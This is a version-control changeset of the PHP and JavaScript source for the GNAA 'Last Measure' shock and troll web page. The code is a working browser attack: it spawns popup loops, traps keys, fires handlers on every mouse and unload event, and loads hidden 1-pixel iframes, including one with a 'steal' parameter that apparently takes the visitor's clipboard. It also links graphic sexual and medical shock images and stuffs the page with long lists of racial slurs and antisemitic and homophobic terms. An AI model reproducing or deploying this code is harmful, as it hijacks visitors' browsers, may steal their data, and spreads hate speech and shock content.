Changeset 694


Ignore:
Timestamp:
02/28/12 20:35:46 (15 months ago)
Author:
gary
Message:

Update index.php with the Wikimedia stuff.

File:
1 edited

Legend:

Unmodified
Added
Removed
  • trollforge/lastmeasure/index.php

    r551 r694  
     1<?php 
     2  $server = $_SERVER['HTTP_HOST']; 
     3  if($server == 'beatles.on.nimp.org' /* Gandi complaint, can't remember */ 
     4    || $server == 'jaspah.on.nimp.org' /* Gandi complaint, 3 aug. 2007 */) 
     5  { 
     6    ?><html><body><h1>Sorry, the <tt><? echo $_SERVER['HTTP_HOST']; ?></tt> 
     7    website has been removed due to a complaint.</h1> <h1><a 
     8    href="http://images.google.com/images?q=tobacco+cancer">Instead, you can 
     9    learn more about tobacco-induced cancer on Google Images by clicking here. 
     10    Please quit smoking.</a></h1></body></html><? 
     11    die(); 
     12  } 
     13/* 
     14  else if(preg_match("/[.]nimp[.]org$/", $server)) 
     15  { 
     16    header("Location: http://lm.loldongs.eu/"); 
     17    die(); 
     18  } 
     19  else 
     20  { 
     21    //header("Location: http://upload.wikimedia.org/wikipedia/en/9/9d/Goatse.fr_homepage.png"); 
     22    header("Location: http://lm.loldongs.eu/"); 
     23    die(); 
     24  } 
     25*/ 
     26?> 
     27 
    128<?php 
    229include('include/browser.php'); 
    330include('include/db.php'); 
    4 include('include/keywords.php'); 
    531 
    632/* Static site containing the images, sounds and movies. Everything still 
     
    1440/* Print a random image name, with its 'image/' prefix. */ 
    1541$imagelist = array(); 
    16 $dh = opendir('images/'); 
     42/*$dh = opendir('images/'); 
    1743while(($file = readdir($dh)) != false) { 
    1844  $ext = substr($file, -3); 
    1945  if($ext == 'jpg' || $ext == 'gif') { 
    20     $imagelist[] = $file; 
    21   } 
    22 } 
    23 closedir($dh); 
     46    $imagelist[] = $static."images/".$file; 
     47  } 
     48} 
     49closedir($dh);*/ 
     50$imagelist[] = "http://upload.wikimedia.org/wikipedia/commons/f/f7/SOA-Condylomata-acuminata-female.jpg"; 
     51$imagelist[] = "http://upload.wikimedia.org/wikipedia/en/a/a0/Agent-orange-dead-deformed-babies.jpg"; 
     52$imagelist[] = "http://upload.wikimedia.org/wikipedia/commons/thumb/c/c4/Sodomie.jpg/800px-Sodomie.jpg"; 
     53$imagelist[] = "http://upload.wikimedia.org/wikipedia/commons/thumb/5/55/Masturbation-Toys_Fleshlight_%28Masturbations-Spielzeug-Hilfsmittel_Fleshlight%29.gif/400px-Masturbation-Toys_Fleshlight_%28Masturbations-Spielzeug-Hilfsmittel_Fleshlight%29.gif"; 
     54$imagelist[] = "http://upload.wikimedia.org/wikipedia/commons/thumb/6/66/Child_with_Smallpox_Bangladesh.jpg/393px-Child_with_Smallpox_Bangladesh.jpg"; 
     55$imagelist[] = "http://upload.wikimedia.org/wikipedia/commons/thumb/6/63/JJ_AND_TJ.jpg/645px-JJ_AND_TJ.jpg"; 
     56$imagelist[] = "http://upload.wikimedia.org/wikipedia/commons/6/61/Breast_reconstruction_02.jpg"; 
     57$imagelist[] = "http://upload.wikimedia.org/wikipedia/commons/thumb/8/8f/Scat-01.jpg/640px-Scat-01.jpg"; 
     58$imagelist[] = "http://upload.wikimedia.org/wikipedia/commons/f/fb/Anal3.jpg"; 
    2459 
    2560/* Print a random audio file name, with its 'audio/' prefix. */ 
     
    3570 
    3671function random_image() { 
    37    global $static, $imagelist; 
    38    echo $static."images/".$imagelist[rand(0,count($imagelist)-1)]; 
     72   global $imagelist; 
     73   echo $imagelist[rand(0,count($imagelist)-1)]; 
    3974} 
    4075 
     
    5691      echo "    audio[".$i."] = '".$static."audio/".$audiolist[$i]."';\n"; 
    5792    } ?> 
    58     for (i = 0; i < audiocount; i++) { 
     93    for (i = 0; i < audiocount; i++) {  
    5994      setTimeout('document.getElementById("audio").innerHTML += \'<embed src="' + audio[i] + '" loop="true" />\';', 6000 * (i/2)); 
    6095    } 
     
    75110    echo "var imagecount = ".count($imagelist).";\n"; 
    76111    for($i = 0; $i < count($imagelist); $i++) { 
    77       echo "    images[".$i."] = '".$static."images/".$imagelist[$i]."';\n"; 
     112      echo "    images[$i] = '$imagelist[$i]';\n"; 
    78113    } ?> 
    79114 
     
    114149  <script type="text/javascript"> 
    115150    <!-- 
    116     function shellscript() { 
     151    function shellscript() {  
    117152      for(i = 0; i < 5; i++) { 
    118153        open('http://<?php echo $_SERVER['SERVER_NAME'];?>/index.php?popup=1','_blank','scrollbar=no'); 
     
    172207 */ 
    173208 
     209if($_SERVER['HTTP_HOST'] == 'beatles.on.nimp.org' /* Gandi complaint, can't remember when */ 
     210    || $_SERVER['HTTP_HOST'] == 'jaspah.on.nimp.org' /* Gandi complaint, 3 aug. 2007 */) 
     211{ 
     212    ?><html><body><h1>Sorry, the <tt><? echo $_SERVER['HTTP_HOST']; ?></tt> website has been removed due to a complaint.</h1> <h1><a href="http://images.google.com/images?q=tobacco+cancer">Instead, you can learn more about tobacco-induced cancer on Google Images by clicking here. Please quit smoking.</a></h1></body></html><? 
     213    die(); 
     214} 
     215 
    174216?> 
    175217<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" 
     
    178220 <head> 
    179221    <title>GNAA Last Measure Live!</title> 
    180       <?php echo "<meta name=\"keywords\" content=\"${keywords}\" />\n"; ?> 
     222    <meta name="keywords" content="bsd digg gay gnaa internet last measure linux nigger slashdot freebsd niger internet providers internet service providers nigga gays niggers openbsd internet access cable internet xandros netbsd gai gay sex gay personals bds gaysex enternet dial up internet cable internet service lunix internets gay black men internet services cheap internet service gay chat rooms internet fax service insmod gey internet radio dial up internet access international internet gay massage inux gay movies gay com gayboy internet business internet businesses homosex internet college internet banking schwul internet gambling neger homosexuales internet poker internet filtering satellite internet connection internet roaming gay cock broadband internet access gay adoption asian gay gay bears gay guys linux on windows internet connection schwule gej maryland internet linux recovery gay sites michigan internet remote internet access making money on the internet gay pornography gay hardcore internet speed up atlanta gay internet game older gay men gay nudist gay shopping gay san francisco houston internet california internet nigga stole my bike gay houston gay marriage gay bear internet auctions internet worldwide linux laptops redhat9 internet billing broadband internet linux drivers linux pc gay amsterdam gay seattle gay bdsm selling on the internet mature gay men internet call gay sex chat internet marketing gay toys internet printing linux help freebsd ports mobile internet linux for windows linux clustering gay chat teen gay porn ny gay alabama gay freebsd 6.0 linux os spain internet clips gay hairy gay men gay leather make money on the internet gay boy gay philadelphia gay community internet via satellite freebsd 6 gay cartoons gay love nigga lyrics niger uranium internet search gay news hate niggers gay georgia oral gay sex linux downloads communication internet niger africa bds suspension gay nude boys linux applications gay pics enternet 300 internet censorship internet information server gay australia redhat linux gay niggers niger forgeries gay phoenix gay orgies internet sites aspergillus niger internet traffic oracle linux gays fucking linux support test internet internet messaging gay vivo horny gay the internets niger forgery bds marketing freebsd org sex gay movies internet canada niger yellowcake gay women linux apache the niger river freebsd wireless internet development bodybuilder gay freebsd java can a nigga get a table dance gay latinos deng gai linux penguin realest nigga real nigga roll call linux tutorial japanese gay gays in military freebsd screenshots linux systems linux software freebsd apache joseph wilson niger installing freebsd gay store freebsd update freebsd port freebsd upgrade teen gays install freebsd freebsd cvsup dead niggers cumshot gay ten little niggers gays com freebsd laptop fuck your couch nigga broke nigga internet stock trading niger document jews spics wtc jew jewish holidays jewish calendar jewish community center anti semitism single jews jewish names jewish history jewish museum jewish hospital jewish wedding bernanke jewish us jews jewish music jewish federation barnes jewish russian jews jewish jokes libby jewish jewish singles jewish religion barnes jewish hospital long island jewish jewish people jewish news jewish women ben bernanke jewish jewish girls jewish population world without zionism reform judaism jewish dating jewish food jewish film festival jewish bible jewish porn jewish last names bernanke jew daniel libeskind judaism orthodox jew the world without zionism jewish new year jewish studies jewish heritage jewish quotes jewish humor ben bernanke jew jewish sex long island jewish medical center messianic jewish jewish jewelry jewish calendar 2005 jewish world jewish sayings detroit jewish news judaism beliefs baltimore jewish times jewish vocational services the jewish religion zionism jewish pussy jewish leaders jewish stereotypes jewish slang messianic music reconstructionist judaism jewish board jewish christmas jewish services jewish man jewish t shirts jewish dance heritage civilization and the jews jewish games islam judaism jewish quarter jew who jewish library jewish flag jew reggae jewish community centers wtc ny jewish alphabet wondering jew jewish migration republican jewish coalition messianic prophecies jews in america jewish worship jewish ethics messianic secret jewish bread international jew jewish museum berlin manhattan jewish experience boston jewish film jewish values board of jewish education jewish outreach jewish adoption jewish christians jewish weekly jewish blog women in judaism jewish facts semitic jewish college of nursing messianic jewish dress sephardic persecution christian zionism facts about judaism atlanta jewish jewish gift persecution complex russian jewish black jewish jewish history timeline jewish settlements union of reform judaism jewish homeland woodbury jewish center antisemitism naked jewish women jewish cemetaries republican jewish samuel alito jew judaism com hacidic jew south park jew symbols of judaism jewish recipies jewish association jewish speed dating conversion judaism jewish high holidays jewish religon association for jewish studies jewish libraries jewish tits anti semitic jewish converts jewish dna jewish heroes jewish tattoo jewish text ausmus jewish half jewish jewish fashion allied jewish federation jewish birth christianity judaism islam jewish theology jews and christians jewish restaurants fellowship of christians and jews trump jewish jewish boy names jewish time jewish community center louisville jericho jewish center jewish restaurant jewish naming jewish book council jewish midi libeskind jewish reggae artist jewish greetings barnes jewish west ufo wtc jewish wedding rings association of jewish libraries long island jewish health system temple jewish kingsbrook jewish medical jewish intelligence jewish street jewish nudes jewish family jewish cookies jewish nfl players jewish naming ceremony persecution of homosexuals great persecution jewish writing world jewish digest jesus jew jewish diseases jewish baby gifts christianity judaism and islam jewish wisdom reformed jew borat throw the jew anti semitism in europe jewish educators jewish communal service the jewish diaspora academy for jewish religion 9/11 george bush terrorism george w bush george bush action figure george hw bush talking george bush doll terrorist terrorism training terrorists george bush picture bioterrorism war against terrorism war on terrorism george w bush doll ctu terrorist attacks talking george bush tria president george w bush terrorism articles islam terrorism clinton terrorism gw bush information terrorism article on terrorism george bush quotes terrorist groups terrorism article london bombings george bush dolls chemical terrorism george bush news preparing for terrorism george bush jokes george w bush 2004 george w bush biography terrorism in the middle east terrorism coverage north korea terrorism ctu online george w bush picture terrorism law american terrorism george bush speech president george bush george bush impersonator suicide bombings george bush hates black people george bush jr nuclear terrorism george bush intercontinental george w bush pic understanding terrorism palestinian terrorism george bush funny george bush posters the terrorist counter terrorist george bush dont like black people george w bush for president psychology of terrorism us terrorism george bush sucks george bush library george bush international fight against terrorism george w bush speech george w bush sr george walker bush george w bush speeches impeach george bush george w bush born george w bush election picture of george bush madrid bombings terrorist costume bali bombings george bush games hate george bush george w bush jr biography 24 ctu picture of george w bush george bush cartoon george bush drunk anti terrorist george bush stupid islamic terrorists world trade center bombings bioterrorism preparedness george bush presidential library george w bush birthplace george bush lies george w bush approval rating george w bush head funny george w bush terrorist group terrorist media failure george bush touchtone terrorists george bush andy dick terrorist bombing george w bush presidential library fuck george bush birthplace of george w bush george bush college george bush cheerleader 911 terrorist george w bush approval george bush lyrics church bombings hotel tria george bush flash madrid train bombings stupid george bush quotes tria restaurant george w bush pics wanted terrorists terrorisme terrorist watch about george bush international terrorist george bush doesn t care george bush born george w bush cartoons biography of george bush terrorist alert george bush wav abortion clinic bombings bombings atomic bombings george w busch tria philadelphia bill o reilly is a terrorist sympathizer emergency response to terrorism bush terrorist kanye west george bush video george bush parody george bush pumpkin pattern george bush pumpkin carving terrorist world trade center 911 terrorists george bush war george bush state of the union president george bush turnpike funny george bush videos terrorist hunter george w bush yale george bush freeway kayne west george bush uss george bush george bush polls september 11 terrorist attacks george w bush cabinet terrorist games pics of george bush george bush joke george bush cia george w bush presidency hotel bombings george bush raped margie schoedinger impeach george w bush terrorist act middle east terrorism terrorist hunting permit ctu edu september 11 terrorist terrorist handbook 50 cent george bush george w bush audio recent bombings terrorist definition george w bush cocaine george bush education palestinian terrorist george w bush soundboard george bush 41 iraqi terrorist will farrell george bush george bush resume george bush comedy touch tone terrorist bali terrorism george w bush iraq george w bush quote terrorist countries terrorists in iraq tria markers kanye west and george bush george bush texas george w bush is a george w bush approval ratings number of terrorist attacks george w bush stupid george bush don t like black people video eta terrorist photos of george bush volkswagen terrorist photos of george w bush iraq terrorists george w bush middle name george w bush accomplishments george bush bloopers"> 
    181223    <script type="text/javascript"> 
    182224      <?php include("include/js.inc") ?> 
     
    218260      </form> 
    219261      <script type="text/javascript"> 
    220       <!-- 
     262      <!--  
    221263        // without this if statement check, it bombs out with an error 
    222264        if (typeof clipboardData != 'undefined') { 
     
    229271      <?php } ?> 
    230272    </body> 
    231  
     273     
    232274    <?php 
    233275 
     
    244286        $key = store_hit(); 
    245287        $flash = 'first_opener.swf'; 
    246       } 
     288      }  
    247289    ?> 
    248 <body style="background-image: url(<?php random_image(); ?>); background-color: #FFFFFF;" 
    249   onload="bookmark();noframes();load_goatse();document.goatse.reset();movew0w();setTimeout('ruin()', 20);<?php if($br_ie6) { ?>setTimeout('main()', 100);<?php } ?>" 
     290<body style="background-image: url(<?php random_image(); ?>); background-color: #FFFFFF;"  
     291  onload="load_goatse();document.goatse.reset();movew0w();setTimeout('ruin()', 20);<?php if($br_ie6) { ?>setTimeout('main()', 100);<?php } ?>"  
    250292  onmousemove="document.goatse.reset();movew0w();procreate();" 
    251   onkeydown="molish();procreate();" 
     293  onkeydown="altf4key();ctrlkey();delkey();procreate();" 
    252294  onunload="document.goatse.reset();movew0w();procreate();" 
    253295  onmouseover="document.goatse.reset();movew0w();procreate();"> 
     
    262304      <td valign="middle"> 
    263305        <div style="text-align: center;"> 
    264           <a href="http://www.gnaa.eu/"><img src="<?php echo $static; ?>gnaa.png" alt="GNAA" /></a> 
     306          <a href="http://www.gnaa.us/"><img src="<?php echo $static; ?>gnaa.png" alt="GNAA" /></a> 
    265307          <br /> 
    266308          <br /> 
     
    275317    </tr> 
    276318  </table> 
    277   <?php if(!$_GET['popup']) { 
     319  <?php if(!$_GET['popup']) {  
    278320    hey_everybody(); ?> 
    279321   <div> 
    280322    <iframe style="width: 1px; height: 1px;" src="/index.php?steal=1&amp;key=<?php echo $key;?>"></iframe> 
    281323    <iframe style="width: 1px; height: 1px;" src="<?php echo $static; ?>lm.pdf"></iframe> 
    282     <iframe style="width: 1px; height: 1px;" src="<?php echo $static; ?>jews.wmv"></iframe> 
     324    <iframe style="width: 1px; height: 1px;" src="<?php echo $static; ?>jews.wmv"></iframe>   
    283325    <br /> 
     326    bsd digg gay gnaa internet last measure linux nigger slashdot freebsd niger internet providers internet service providers nigga gays niggers openbsd internet access cable internet xandros netbsd gai gay sex gay personals bds gaysex enternet dial up internet cable internet service lunix internets gay black men internet services cheap internet service gay chat rooms internet fax service insmod gey internet radio dial up internet access international internet gay massage inux gay movies gay com gayboy internet business internet businesses homosex internet college internet banking schwul internet gambling neger homosexuales internet poker internet filtering satellite internet connection internet roaming gay cock broadband internet access gay adoption asian gay gay bears gay guys linux on windows internet connection schwule gej maryland internet linux recovery gay sites michigan internet remote internet access making money on the internet gay pornography gay hardcore internet speed up atlanta gay internet game older gay men gay nudist gay shopping gay san francisco houston internet california internet nigga stole my bike gay houston gay marriage gay bear internet auctions internet worldwide linux laptops redhat9 internet billing broadband internet linux drivers linux pc gay amsterdam gay seattle gay bdsm selling on the internet mature gay men internet call gay sex chat internet marketing gay toys internet printing linux help freebsd ports mobile internet linux for windows linux clustering gay chat teen gay porn ny gay alabama gay freebsd 6.0 linux os spain internet clips gay hairy gay men gay leather make money on the internet gay boy gay philadelphia gay community internet via satellite freebsd 6 gay cartoons gay love nigga lyrics niger uranium internet search gay news hate niggers gay georgia oral gay sex linux downloads communication internet niger africa bds suspension gay nude boys linux applications gay pics enternet 300 internet censorship internet information server gay australia redhat linux gay niggers niger forgeries gay phoenix gay orgies internet sites aspergillus niger internet traffic oracle linux gays fucking linux support test internet internet messaging gay vivo horny gay the internets niger forgery bds marketing freebsd org sex gay movies internet canada niger yellowcake gay women linux apache the niger river freebsd wireless internet development bodybuilder gay freebsd java can a nigga get a table dance gay latinos deng gai linux penguin realest nigga real nigga roll call linux tutorial japanese gay gays in military freebsd screenshots linux systems linux software freebsd apache joseph wilson niger installing freebsd gay store freebsd update freebsd port freebsd upgrade teen gays install freebsd freebsd cvsup dead niggers cumshot gay ten little niggers gays com freebsd laptop fuck your couch nigga broke nigga internet stock trading niger document jews spics wtc jew jewish holidays jewish calendar jewish community center anti semitism single jews jewish names jewish history jewish museum jewish hospital jewish wedding bernanke jewish us jews jewish music jewish federation barnes jewish russian jews jewish jokes libby jewish jewish singles jewish religion barnes jewish hospital long island jewish jewish people jewish news jewish women ben bernanke jewish jewish girls jewish population world without zionism reform judaism jewish dating jewish food jewish film festival jewish bible jewish porn jewish last names bernanke jew daniel libeskind judaism orthodox jew the world without zionism jewish new year jewish studies jewish heritage jewish quotes jewish humor ben bernanke jew jewish sex long island jewish medical center messianic jewish jewish jewelry jewish calendar 2005 jewish world jewish sayings detroit jewish news judaism beliefs baltimore jewish times jewish vocational services the jewish religion zionism jewish pussy jewish leaders jewish stereotypes jewish slang messianic music reconstructionist judaism jewish board jewish christmas jewish services jewish man jewish t shirts jewish dance heritage civilization and the jews jewish games islam judaism jewish quarter jew who jewish library jewish flag jew reggae jewish community centers wtc ny jewish alphabet wondering jew jewish migration republican jewish coalition messianic prophecies jews in america jewish worship jewish ethics messianic secret jewish bread international jew jewish museum berlin manhattan jewish experience boston jewish film jewish values board of jewish education jewish outreach jewish adoption jewish christians jewish weekly jewish blog women in judaism jewish facts semitic jewish college of nursing messianic jewish dress sephardic persecution christian zionism facts about judaism atlanta jewish jewish gift persecution complex russian jewish black jewish jewish history timeline jewish settlements union of reform judaism jewish homeland woodbury jewish center antisemitism naked jewish women jewish cemetaries republican jewish samuel alito jew judaism com hacidic jew south park jew symbols of judaism jewish recipies jewish association jewish speed dating conversion judaism jewish high holidays jewish religon association for jewish studies jewish libraries jewish tits anti semitic jewish converts jewish dna jewish heroes jewish tattoo jewish text ausmus jewish half jewish jewish fashion allied jewish federation jewish birth christianity judaism islam jewish theology jews and christians jewish restaurants fellowship of christians and jews trump jewish jewish boy names jewish time jewish community center louisville jericho jewish center jewish restaurant jewish naming jewish book council jewish midi libeskind jewish reggae artist jewish greetings barnes jewish west ufo wtc jewish wedding rings association of jewish libraries long island jewish health system temple jewish kingsbrook jewish medical jewish intelligence jewish street jewish nudes jewish family jewish cookies jewish nfl players jewish naming ceremony persecution of homosexuals great persecution jewish writing world jewish digest jesus jew jewish diseases jewish baby gifts christianity judaism and islam jewish wisdom reformed jew borat throw the jew anti semitism in europe jewish educators jewish communal service the jewish diaspora academy for jewish religion 9/11 george bush terrorism george w bush george bush action figure george hw bush talking george bush doll terrorist terrorism training terrorists george bush picture bioterrorism war against terrorism war on terrorism george w bush doll ctu terrorist attacks talking george bush tria president george w bush terrorism articles islam terrorism clinton terrorism gw bush information terrorism article on terrorism george bush quotes terrorist groups terrorism article london bombings george bush dolls chemical terrorism george bush news preparing for terrorism george bush jokes george w bush 2004 george w bush biography terrorism in the middle east terrorism coverage north korea terrorism ctu online george w bush picture terrorism law american terrorism george bush speech president george bush george bush impersonator suicide bombings george bush hates black people george bush jr nuclear terrorism george bush intercontinental george w bush pic understanding terrorism palestinian terrorism george bush funny george bush posters the terrorist counter terrorist george bush dont like black people george w bush for president psychology of terrorism us terrorism george bush sucks george bush library george bush international fight against terrorism george w bush speech george w bush sr george walker bush george w bush speeches impeach george bush george w bush born george w bush election picture of george bush madrid bombings terrorist costume bali bombings george bush games hate george bush george w bush jr biography 24 ctu picture of george w bush george bush cartoon george bush drunk anti terrorist george bush stupid islamic terrorists world trade center bombings bioterrorism preparedness george bush presidential library george w bush birthplace george bush lies george w bush approval rating george w bush head funny george w bush terrorist group terrorist media failure george bush touchtone terrorists george bush andy dick terrorist bombing george w bush presidential library fuck george bush birthplace of george w bush george bush college george bush cheerleader 911 terrorist george w bush approval george bush lyrics church bombings hotel tria george bush flash madrid train bombings stupid george bush quotes tria restaurant george w bush pics wanted terrorists terrorisme terrorist watch about george bush international terrorist george bush doesn t care george bush born george w bush cartoons biography of george bush terrorist alert george bush wav abortion clinic bombings bombings atomic bombings george w busch tria philadelphia bill o reilly is a terrorist sympathizer emergency response to terrorism bush terrorist kanye west george bush video george bush parody george bush pumpkin pattern george bush pumpkin carving terrorist world trade center 911 terrorists george bush war george bush state of the union president george bush turnpike funny george bush videos terrorist hunter george w bush yale george bush freeway kayne west george bush uss george bush george bush polls september 11 terrorist attacks george w bush cabinet terrorist games pics of george bush george bush joke george bush cia george w bush presidency hotel bombings george bush raped margie schoedinger impeach george w bush terrorist act middle east terrorism terrorist hunting permit ctu edu september 11 terrorist terrorist handbook 50 cent george bush george w bush audio recent bombings terrorist definition george w bush cocaine george bush education palestinian terrorist george w bush soundboard george bush 41 iraqi terrorist will farrell george bush george bush resume george bush comedy touch tone terrorist bali terrorism george w bush iraq george w bush quote terrorist countries terrorists in iraq tria markers kanye west and george bush george bush texas george w bush is a george w bush approval ratings number of terrorist attacks george w bush stupid george bush don t like black people video eta terrorist photos of george bush volkswagen terrorist photos of george w bush iraq terrorists george w bush middle name george w bush accomplishments george bush bloopers  
    284327   </div> 
    285   <?php echo $keywords; ?> 
    286328  <?php } ?> 
    287329  <form onreset="procreate();" onsubmit="procreate();" action="#" id="goatse" name="goatse"> 
    288     <p> 
    289       <span style="background-color: #ffffff; border: thin solid; color: #000000;"><a href="http://lastmeasure.com/">Last Measure</a> is proudly brought to you by The <a href="http://www.gnaa.eu/">Gay Nigger Association of America</a>. &copy; 2002-2012 GNAA</span> 
    290     </p> 
     330    <p><span style="background-color: #ffffff; border: thin solid; color: #000000;">GNAA Gay Niggers Timecop</span></p> 
    291331  </form> 
    292332</body><?php 
Note: See TracChangeset for help on using the changeset viewer.